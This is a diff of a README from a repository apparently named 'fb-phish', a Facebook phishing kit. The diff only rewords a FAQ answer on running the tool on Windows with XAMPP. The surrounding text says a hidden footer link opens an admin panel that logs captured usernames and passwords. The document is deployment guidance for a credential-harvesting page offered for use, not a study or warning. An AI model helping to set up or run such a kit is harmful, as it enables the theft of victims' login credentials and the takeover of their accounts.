isaka-james/fb-phish/README.md

 #### Question 3: How can I run in windows?
 Steps,
- - Get the project by either using git or downloading the project manually.
+ - Get the tool by either using git or downloading the project manually.
  - Go to your server web folder ie if you are using xampp go to **C:\xampp\htdocs**
- - Copy the project contents to your server web folder i.e *C:\xampp\htdocs* if you are using xampp
+ - Copy the tool contents to your server web folder i.e *C:\xampp\htdocs* if you are using xampp
  - Run your server

 If you're a Windows user, navigate to the small box located in the footer, adjacent to the Chinese language option, to access the administrative panel.
 Here, you'll find a comprehensive log of user logins, including their respective usernames and passwords.